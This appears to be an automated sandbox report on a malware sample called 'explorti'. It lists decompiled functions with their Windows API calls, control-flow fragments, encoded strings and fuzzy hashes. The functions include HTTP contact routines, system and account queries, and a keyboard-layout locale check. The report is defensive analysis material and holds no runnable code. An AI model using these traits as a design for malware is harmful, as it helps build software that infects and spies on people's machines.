                      Total number of Limit Nodes:28

                      Control-flow Graph: function e9bd30 (graph rendering not preserved)
                      APIs
                      • InternetOpenW.WININET(00EE8D18,00000000,00000000,00000000,00000000), ref: 00E9BDBC
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E9BDE1
                      • HttpOpenRequestA.WININET(?,00000000), ref: 00E9BE2A
                      • HttpSendRequestA.WININET(?,00000000), ref: 00E9BEEB
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 00E9BF9D
                      • InternetCloseHandle.WININET(?), ref: 00E9C077
                      • InternetCloseHandle.WININET(?), ref: 00E9C07F
                      • InternetCloseHandle.WININET(?), ref: 00E9C087
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmp
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmp
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                      • String ID: UfNm$Ux1MTw==$aAJTaDE6OpZ=$aAJTazgvOn==$invalid stoi argument$stoi argument out of range$3$k
                      • API String ID: 688256393-3541917878
                      • Opcode ID: 1c015bdabd87190daf1f6dc4a462968d446d6be276003026ce6eb90ae4b0acea
                      • Instruction ID: 8851d719b0e8924db848d7b7a9582653bcc1cf4364867d312a64ae7b7f08690d
                      • Opcode Fuzzy Hash: 1c015bdabd87190daf1f6dc4a462968d446d6be276003026ce6eb90ae4b0acea
                      • Instruction Fuzzy Hash: C9B1D4B1A001189BDF28DF28CD85BEEBBB9EF45304F605198F509A7292D7759AC0CF94

                      Control-flow Graph: function e96590 (graph rendering not preserved)
                      APIs
                      • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00E96630
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: AccountLookupName
                      • String ID: JLTlbM==$LLNlbM==$UrSe DMt
                      • API String ID: 1484870144-2175010088
                      • Opcode ID: 26a525638347688097e27bef03bc38b92b3d17b96719179bcf16ed2be1015450
                      • Instruction ID: 4e5f3def470547da13960ba0e5a089fce8bd61167e2eb369535aa457c2172c3a
                      • Opcode Fuzzy Hash: 26a525638347688097e27bef03bc38b92b3d17b96719179bcf16ed2be1015450
                      • Instruction Fuzzy Hash: 6791D3B19001189BDF29DB24CC85BEDB7B9EB45304F4055EAE509E7292DA349FC4CFA4
                      APIs
                        • Part of subcall function 00EA7840: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00EA792C
                        • Part of subcall function 00EA7840: __Cnd_destroy_in_situ.LIBCPMT ref: 00EA7938
                        • Part of subcall function 00EA7840: __Mtx_destroy_in_situ.LIBCPMT ref: 00EA7941
                        • Part of subcall function 00E9BD30: InternetOpenW.WININET(00EE8D18,00000000,00000000,00000000,00000000), ref: 00E9BDBC
                        • Part of subcall function 00E9BD30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E9BDE1
                        • Part of subcall function 00E9BD30: HttpOpenRequestA.WININET(?,00000000), ref: 00E9BE2A
                      • std::_Xinvalid_argument.LIBCPMT ref: 00EA4E72
                      • Sleep.KERNELBASE ref: 00EA6B35
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
                      • String ID: 246122658369$4dd39d$Ip==$NvWsKw==$PzE+$PzI+$YQAZ$YQQZ$YfcZ$ZzSZ$aPIZ$bAQZ$bV5Z$bWEZ$cVIZ$cWI2as==$ccS=$czEZ$dPWZ$dgEZ$invalid stoi argument$stoi argument out of range
                      • API String ID: 4201286991-368581918
                      • Opcode ID: 935de888c671147ff3023924fdc21e1c4a89c6820005f682e66bd950d3b4d097
                      • Instruction ID: cfebc8424ddd4c07f56d553b6582c5859a44234d5d79b8df8fb9f5e29d0e455c
                      • Opcode Fuzzy Hash: 935de888c671147ff3023924fdc21e1c4a89c6820005f682e66bd950d3b4d097
                      • Instruction Fuzzy Hash: 31230771E002488BEB19DB28CD4579DBBB69B8A304F5491D8E049BF2C2DB75AF84CF51
                      APIs
                        • Part of subcall function 00EA7840: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00EA792C
                        • Part of subcall function 00EA7840: __Cnd_destroy_in_situ.LIBCPMT ref: 00EA7938
                        • Part of subcall function 00EA7840: __Mtx_destroy_in_situ.LIBCPMT ref: 00EA7941
                        • Part of subcall function 00E9BD30: InternetOpenW.WININET(00EE8D18,00000000,00000000,00000000,00000000), ref: 00E9BDBC
                        • Part of subcall function 00E9BD30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E9BDE1
                        • Part of subcall function 00E9BD30: HttpOpenRequestA.WININET(?,00000000), ref: 00E9BE2A
                      • std::_Xinvalid_argument.LIBCPMT ref: 00EA4E72
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                      • String ID: 246122658369$4dd39d$Ip==$NvWsKw==$PzE+$PzI+$YQAZ$YQQZ$YfcZ$ZzSZ$aPIZ$bAQZ$bV5Z$bWEZ$cVIZ$cWI2as==$ccS=$czEZ$dPWZ$dgEZ$stoi argument out of range$k
                      • API String ID: 2414744145-103956707
                      • Opcode ID: 4019fa345c9c0e22695af51e199aa18a979dd328ecab3ea470bb9ab384705190
                      • Instruction ID: dc30b81149382fe35931f796c01e925397ba0fe45003a5eee9087e003f4b5693
                      • Opcode Fuzzy Hash: 4019fa345c9c0e22695af51e199aa18a979dd328ecab3ea470bb9ab384705190
                      • Instruction Fuzzy Hash: 9E232571E002588BEB19DB28CD8579DBBB29B8A304F5491D8E049BF2C2DB756F84CF51

                      Control-flow Graph: function e97ce0 (graph rendering not preserved)
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E97E83
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: 0k$McsqLc==$McsqMM==$McsrKc==$PGm$Xk
                      • API String ID: 1721193555-4201006178
                      • Opcode ID: 3c8f4b6a02eac5c6fedb3ef1c702d7fd6bdf32dd98ceb5001a11efa4dd81a730
                      • Instruction ID: 2f81ab7d1bd0f615153022daedf9d053e8705fcc98aebbb37f10d50ee3204233
                      • Opcode Fuzzy Hash: 3c8f4b6a02eac5c6fedb3ef1c702d7fd6bdf32dd98ceb5001a11efa4dd81a730
                      • Instruction Fuzzy Hash: CFD11771E006149BDF24EB28DD463AD7BB1AB86314F90628CE455BB3D2EB745E84C7C2

                      Control-flow Graph: function e95dd0 (graph rendering not preserved)
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: b50d75662c1f5da913f5cbbeaf2979ab059ddb0cd7044d39d8e05c5ef62d6421
                      • Instruction ID: aa7e876e68033c7cb2e21adb45d06eb5b16e63cca23e8fb33d56c1b5c1bc9864
                      • Opcode Fuzzy Hash: b50d75662c1f5da913f5cbbeaf2979ab059ddb0cd7044d39d8e05c5ef62d6421
                      • Instruction Fuzzy Hash: 03E1AA71904218ABEF25DBA4CC88BDEB7B9EB05304F5042D9E409BB291DB74ABC4CF51

                      Control-flow Graph: function e98290 (graph rendering not preserved)
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00E98434
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: 0k$Xk
                      • API String ID: 1721193555-2312125285

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2140 ec6de1-ec6e16 GetFileType 2141 ec6e1c-ec6e27 2140->2141 2142 ec6ece-ec6ed1 2140->2142 2145 ec6e49-ec6e65 call ec4000 GetFileInformationByHandle 2141->2145 2146 ec6e29-ec6e3a call ec7157 2141->2146 2143 ec6efa-ec6f22 2142->2143 2144 ec6ed3-ec6ed6 2142->2144 2149 ec6f3f-ec6f41 2143->2149 2150 ec6f24-ec6f37 2143->2150 2144->2143 2147 ec6ed8-ec6eda 2144->2147 2155 ec6eeb-ec6ef8 call ec73ed 2145->2155 2162 ec6e6b-ec6ead call ec70a9 call ec6f51 * 3 2145->2162 2158 ec6ee7-ec6ee9 2146->2158 2159 ec6e40-ec6e47 2146->2159 2154 ec6edc-ec6ee1 call ec7423 2147->2154 2147->2155 2153 ec6f42-ec6f50 call eacef4 2149->2153 2150->2149 2163 ec6f39-ec6f3c 2150->2163 2154->2158 2155->2158 2158->2153 2159->2145 2176 ec6eb2-ec6eca call ec7076 2162->2176 2163->2149 2176->2149 2179 ec6ecc 2176->2179 2179->2158
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00EC6E03
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00EC6E5D
                      • __dosmaperr.LIBCMT ref: 00EC6EF2
                        • Part of subcall function 00EC7157: __dosmaperr.LIBCMT ref: 00EC718C
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: k
                      • API String ID: 3472027048-2690311395

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2287 ec6c79-ec6c85 2288 ec6ca4-ec6cc8 call ec4000 2287->2288 2289 ec6c87-ec6ca3 call ec7410 call ec7423 call ec6b6a 2287->2289 2295 ec6cca-ec6ce4 call ec7410 call ec7423 call ec6b6a 2288->2295 2296 ec6ce6-ec6d08 CreateFileW 2288->2296 2319 ec6d52-ec6d56 2295->2319 2298 ec6d18-ec6d1f call ec6d57 2296->2298 2299 ec6d0a-ec6d0e call ec6de1 2296->2299 2310 ec6d20-ec6d22 2298->2310 2306 ec6d13-ec6d16 2299->2306 2306->2310 2312 ec6d44-ec6d47 2310->2312 2313 ec6d24-ec6d41 call ec4000 2310->2313 2314 ec6d49-ec6d4f 2312->2314 2315 ec6d50 2312->2315 2313->2312 2314->2315 2315->2319
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2321 ec6f51-ec6f67 2322 ec6f69-ec6f6d 2321->2322 2323 ec6f77-ec6f87 2321->2323 2322->2323 2324 ec6f6f-ec6f75 2322->2324 2327 ec6f89-ec6f9b SystemTimeToTzSpecificLocalTime 2323->2327 2328 ec6fc7-ec6fca 2323->2328 2326 ec6fcc-ec6fd7 call eacef4 2324->2326 2327->2328 2330 ec6f9d-ec6fbd call ec6fd8 2327->2330 2328->2326 2333 ec6fc2-ec6fc5 2330->2333 2333->2326
                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00EC6F93
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2397 4a10d48-4a10dbb 2402 4a10dc9-4a10dca 2397->2402 2403 4a10dd1-4a10e11 2402->2403 2406 4a10e14-4a10e23 call 4a10e29 2403->2406 2409 4a10e25-4a10e27 2406->2409 2410 4a10dbe-4a10dc6 2406->2410 2410->2406 2411 4a10dc8 2410->2411 2411->2402
                      Memory Dump Source
                      • Source File: 00000007.00000002.2882513811.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4a10000_explorti.jbxd
                      Similarity
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 00EA0795
                        • Part of subcall function 00EA7840: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00EA792C
                        • Part of subcall function 00EA7840: __Cnd_destroy_in_situ.LIBCPMT ref: 00EA7938
                        • Part of subcall function 00EA7840: __Mtx_destroy_in_situ.LIBCPMT ref: 00EA7941
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                      • String ID: "$#$111$246122658369$4dd39d$IbsfHety2NVj$IvQfGw==$JbQ PT pgtz=$JgNn9TI9$PJ==$PzE+$Xt==$ZMs=$ZMw=$Zww=$cfxnXC1t$invalid stoi argument$stoi argument out of range$3
                      • API String ID: 4234742559-894115485
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      APIs
                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,00EACE55,?,?,?,?,00EACE8A,?,?,?,?,?,?,00EAC400,?,00000001), ref: 00EACB06
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FilePreciseSystem
                      • String ID:
                      • API String ID: 1802150274-0
                      • Opcode ID: 5a659eb54dce6cf2067ff23fab08acfd9e6c1e67642c533264c2c31128ad70a6
                      • Instruction ID: da78a22164d9405ae592f2156dccd304cf2fc2ce9a61f12d7d199335698577fd
                      • Opcode Fuzzy Hash: 5a659eb54dce6cf2067ff23fab08acfd9e6c1e67642c533264c2c31128ad70a6
                      • Instruction Fuzzy Hash: 72D022326431389BCA112B81BC004BCBB189B4AB507264421FA097B120CA927C408BE1
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 83ad2ee5bbe2d23a3163888fc447324bedac91cc2052fa73e40fcfc257b7184d
                      • Instruction ID: 6f65c16261171e66e28ba07167cb1d6d1d7548117cc84b26511a3e9ecfb378d4
                      • Opcode Fuzzy Hash: 83ad2ee5bbe2d23a3163888fc447324bedac91cc2052fa73e40fcfc257b7184d
                      • Instruction Fuzzy Hash: 47225FB3F515144BDB4CCB9DDCA27EDB2E3AFD8218B0E803DA40AE3345EA79D9158644
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e390ee4f614a8c8012502d35fa4a5169a15b016c652078628ec1d9cd68384b23
                      • Instruction ID: ab51493f68c834cd40cba1f91e95dfa8efa794c868e347240514a5c32e925b0e
                      • Opcode Fuzzy Hash: e390ee4f614a8c8012502d35fa4a5169a15b016c652078628ec1d9cd68384b23
                      • Instruction Fuzzy Hash: A9B15931214609DFD718CF28C486BA57BA0FF45368F259659E8DADF3A1D336E982CB40
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction ID: d5cb74c596df13f24638ed03d601b2ce81af66f59c185457f7dc3eebda49585b
                      • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction Fuzzy Hash: 4351F67220C6485ADB388A288795FFE6F999F52308F14349DE4C3F7681DA139D47CE62
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E923BE
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID:
                      • API String ID: 2659868963-0
                      • Opcode ID: c86ab25c5ff62e18bcede2d226dd9148a366568ca50aef1b29a54c841df43cab
                      • Instruction ID: f9c7365c5e6b30a0f9040e051782b92b0da5f7553a0cd6ad3659ff642c8a9f57
                      • Opcode Fuzzy Hash: c86ab25c5ff62e18bcede2d226dd9148a366568ca50aef1b29a54c841df43cab
                      • Instruction Fuzzy Hash: 9E51BAB2D046068FDB19CF55DC81BAABBF0FB99318F24826AD512FB690D770E904CB50
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: da3bae3f1f968929377bc21c735021256fd565fed029a794c3aad190483b78a1
                      • Instruction ID: 53fdd85ea83a2801cf4190e51c36174f8d904263c92c71bee98b8df334f29a61
                      • Opcode Fuzzy Hash: da3bae3f1f968929377bc21c735021256fd565fed029a794c3aad190483b78a1
                      • Instruction Fuzzy Hash: 7051B4716083D18FD719CF2D851563AFFE1BF99200F084A9EE0DA97292D774E504CB92
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 89613c71693a2eeec8e4f37646b295dd234442cb54d274b8acd7bc31865bcdb7
                      • Instruction ID: 043a705628b68b00b901b8d11c67a296ccee91407465f7d3e8e85bd2cd1a9a81
                      • Opcode Fuzzy Hash: 89613c71693a2eeec8e4f37646b295dd234442cb54d274b8acd7bc31865bcdb7
                      • Instruction Fuzzy Hash: EF21B673F204394B770CC57E8C5727DB6E1C78C641745423AE8A6EA2C1D968D917E2E4
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d6b215f50ad94862740c78f28f570e6e5f582c4a8cd198d02c0622c2edf23942
                      • Instruction ID: 1bc908c3d3608b0fafc36cd07bbbaf02aab87c0e0b20487eacb106805fd5ff8b
                      • Opcode Fuzzy Hash: d6b215f50ad94862740c78f28f570e6e5f582c4a8cd198d02c0622c2edf23942
                      • Instruction Fuzzy Hash: 9C11A323F30C255A675C816D8C172BAA2D2EBD825030F533AD876E7384F9A4DE23D290
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: cfc8f48425a756ae4ad14b23319e82a1e4c335b697e2f73862df227fd2a788d4
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: 63112B7B20008287D6048A2DCAF86B6A795EBC532873D63BBD152EB754DA2299479600
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a8dada3f661cfede07589753502b1ec3eb6806f1d34420d831000289823b62c2
                      • Instruction ID: 0fa3b89a549f2278f04b42fd07c2502faad9c41ca109576429ec8a2aff00dbb9
                      • Opcode Fuzzy Hash: a8dada3f661cfede07589753502b1ec3eb6806f1d34420d831000289823b62c2
                      • Instruction Fuzzy Hash: 09E086300415086EDF297F14D908F4E3BB9FF5174CF049418F8145A621CB26ED83C540
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: 1641b46298485b61cbfe10f067b6bf83cc8ea270a4db1b4fabaabe3f5d8110f3
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: 89E08672912238EBC714DB88C604E4AF3FCE744B08F19046AB501E3151C271DF01C7D0
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                      • String ID:
                      • API String ID: 57040152-0
                      • Opcode ID: 60f3f83412b39d62aa6634b973334f71c9a9df5821fefb7222bf5764c0868a92
                      • Instruction ID: 015a497b7b8a6a93175acebb0f1f78557dfa7508f36f9e991e54c047d1842095
                      • Opcode Fuzzy Hash: 60f3f83412b39d62aa6634b973334f71c9a9df5821fefb7222bf5764c0868a92
                      • Instruction Fuzzy Hash: A3A1E070A01205AFDF11DB74C944BAAB7F8EF19318F149569E915FB282EB34EA04CBD1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: 19a362604a6be5518b95bb1330cbebb414a0a068dd971bfb43785755f95c2205
                      • Instruction ID: 0fcddd3191c2d54d4aee5b44dd7302a053948acdd5a56d86cb1cfa5bb6d7fcd3
                      • Opcode Fuzzy Hash: 19a362604a6be5518b95bb1330cbebb414a0a068dd971bfb43785755f95c2205
                      • Instruction Fuzzy Hash: C901E127A0872925261564199E03F37678C8F92BB8B2A202EFD84F72C2EE56DC0345A0
                      APIs
                      • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00EA792C
                      • __Cnd_destroy_in_situ.LIBCPMT ref: 00EA7938
                      • __Mtx_destroy_in_situ.LIBCPMT ref: 00EA7941
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                      • String ID: L+
                      • API String ID: 4078500453-1478590641
                      • Opcode ID: 02ff272cea51f65da8784fe0133a3a78f7a5e764bcfdce7f9ec9b0c24baa8381
                      • Instruction ID: ca1a0c9eae0f3ec1f1bbca36bc59aff0ec1f0ea067b9c544abc16b5d1b0ca4ff
                      • Opcode Fuzzy Hash: 02ff272cea51f65da8784fe0133a3a78f7a5e764bcfdce7f9ec9b0c24baa8381
                      • Instruction Fuzzy Hash: 8631F5B19043049BD724DF68DC45A5BB7E8EF49310F10162EE986EB642EB75FA44C3A1
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction ID: 0ed73cb3cc0e7134824f237b54d8bc62b7c1c4ca2e1cd7e93329ca12d1551db2
